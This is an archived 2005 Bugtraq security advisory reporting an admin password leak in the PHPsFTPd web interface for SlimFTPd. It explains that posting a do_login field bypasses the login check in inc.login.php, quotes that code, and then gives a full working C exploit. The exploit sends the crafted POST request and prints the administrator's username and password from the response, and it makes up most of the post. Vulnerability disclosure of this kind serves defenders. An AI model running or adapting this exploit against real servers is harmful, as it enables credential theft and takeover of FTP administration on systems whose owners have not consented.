PHPsFTPd - Admin password leak

From: Steve (steve01_at_chello.at)
Date: 07/13/05

  • Next message: Jonathan Angliss: "[SM-ANNOUNCE] SquirrelMail 1.4.5 Released"
    Date: Wed, 13 Jul 2005 14:49:22 +0200
    To: bugtraq@securityfocus.com
    
    

    Author: Stefan Lochbihler
    Date: 11. Juli 2005
    Affected Software: PHPsFTPd
    Software Version: 0.2 -> 0.4
    Software URL: http://phpsftpd.sourceforge.net/
    Attack: Admin password leak

    about PHPsFTPd:
    PHPsFTPd is a web based administration and configuration interface
    for the SLimFTPd ftp serverIt can be used an any http server that
    suports PHP and does not need a database or adittional php modules,
    only SlimFTPD It allows the administrators of the ftp server to
    configurate it from within this interface as opposed to its native
    ascii conf.file It shows statistics about the users that accesed
    the server , the files that were downloaded , server breakdowns etc

    Hi there again

    during a look at the code of the PHPsFTPd Project i find out that it
    is possible to get the Admins Username & Password. This happens
    when we send a specially crafted POST Request to the user.php script.
    The reason of the leakness is at the inc.login.php script.
    When you take a look at the code below you see that the code will exit
    if there is no logged session or we dont try to logout.
    But when we POST the do_login var with some stuff in it execution goes on.

    snipped from inc.login.php

    //login form
    if (!isset($_SESSION['logged']) && !isset($_GET['do_logout']) &&
    !isset($_POST['do_login'])) {
                    echo "<p>&nbsp;</p>
                    <form action='index.php' method='post'>
                    <img src=gfx/ico_notice.gif align=absmiddle> Please login with admin
    pass<br>
                    <input class=td type='password' name='pass'>
                    <input class=button type='submit' name='login' value='Login'>
                    </form>
                    ";
                    die;
    }

    exploit:
    Print the admins username & password

    // PHPsFTPd Admin Password Leak
    // tested on a WinXP SP1 box

    #include "stdafx.h"
    #include "stdio.h"
    #include "winsock2.h"

    #pragma comment (lib,"ws2_32")

    #define PORT 80
    #define rootdir "/phpsftpd/"

    typedef unsigned long ulong;

    void usage(char *);
    ulong checkhost(char *);

    ulong checkhost(char *host)
    {
    struct hostent *hp;
    ulong host_ip=0;

    host_ip=inet_addr(host);
    if(host_ip==INADDR_NONE){
         hp=gethostbyname(host);
    if(!hp){
          printf("unable to resolv host...\n");
            exit(1);
            }

        host_ip= *(ulong*)hp->h_addr;

    }

    return host_ip;

    }

    void usage (char *progn){

    printf("Usage[%s]: www.targethost.com\n",progn);
    exit(0);

    }

    int main(int argc, char* argv[])
    {

        WSADATA wsa;
        SOCKET client;
        WORD wsVersion;

        char httpRequest[1024];
        char recvBuffer[1024];

        char *p;

        struct sockaddr_in addr;
        int err=0,recvSize=0;

        printf("PHPsFTPd Exploit v0.1 (c) by Steve mailto:steve01@chello.at\n");

          if(argc<2)
           usage(argv[0]);
            

    wsVersion=MAKEWORD(2,0);

        if(err=WSAStartup(wsVersion,&wsa)){
         printf("Error: WSAStartup\n");
         exit(0);
    }

         client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
         if(client==INVALID_SOCKET){
         printf("Error: Create Socket\n");
         exit(0);
    }

    addr.sin_addr.s_addr = checkhost(argv[1]);
    addr.sin_port = htons(PORT);
    addr.sin_family = AF_INET;

    memset(httpRequest,'\0',sizeof(httpRequest));

    strncat(httpRequest,"POST ",sizeof(httpRequest)-strlen(httpRequest)-1);
    strncat(httpRequest,rootdir,sizeof(httpRequest)-strlen(httpRequest)-1);
    strncat(httpRequest,"users.php?action=edit&username=root
    HTTP/1.1\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
    strncat(httpRequest,"User-Agent: PHPSFTPD ACCOUNT
    MANAGER\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
    strncat(httpRequest,"Host:
    www.targethost.com\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
    strncat(httpRequest,"Content-Type:
    application/x-www-form-urlencoded\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
    strncat(httpRequest,"Content-Length:
    13\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
    strncat(httpRequest,"\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
    strncat(httpRequest,"do_login=true\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);

    err=connect(client,(SOCKADDR*)&addr,sizeof(addr));

    //Get Http Stuff
    send(client,httpRequest,strlen(httpRequest),0);
    recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0);
    recvBuffer[recvSize]='\0';
    //Get username & password
    recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0);
    recvBuffer[recvSize]='\0';

    //shit when anyone use a 0x20 on his password
    p=strstr(recvBuffer,"value=");
    printf("Username:");

    for(p=p+6;*p!=0x20;p++)
    putc(*p,stdout);

    p=strstr(p,"value=");

    printf("\n");
    printf("Password:");

    for(p=p+6;*p!=0x20;p++)
    putc(*p,stdout);
                 
            
    closesocket(client);
    WSACleanup();

    printf("\n");
    return 0;
    }

    Vendor Status: The Vendor is informed !

    Discovered (c) by Steve

    -- 
    Erstellt mit Operas revolutionärem E-Mail-Modul: http://www.opera.com/m2/
    

  • Next message: Jonathan Angliss: "[SM-ANNOUNCE] SquirrelMail 1.4.5 Released"

    Relevant Pages

    • Re: [SLE] MySQL Database Setup
      ... database and get the web server running. ... Later I installed a tar ball for eZ publish bundled with Apache 1.3, ... To be sure to start on a clean installation, ... before I enabled the http server nor after I enabled the http server. ...
      (SuSE)
    • Re: Swazoo versions
      ... None of our work made it into Swazoo 1.0. ... time we had been saying we used the Swazoo HTTP server, ... modules being the http server and the resource framework. ...
      (comp.lang.smalltalk.dolphin)
    • Re: Network file transfer
      ... >> The spec at the moment is to send xml files from a client, ... The server then confirms it has the file, ... > My thought here was not that you write an HTTP Server. ...
      (comp.lang.java.programmer)
    • Re: Website not available from inside PIX
      ... Windows 2003 Terminal Server and FTP, and the other is an Apache2.2 ... Http server 192.168.2.3: ... access-list outside_in permit icmp any interface outside echo-reply ...
      (comp.dcom.sys.cisco)
    • Re: REST, SOAP, approaches to web connectivity
      ... whether you are using REST or not there has too be a session server for the ... "something" will have to facilitate communication between these ... clients and your D3 server. ... Now all you need is the communication between the middle (http server ...
      (comp.databases.pick)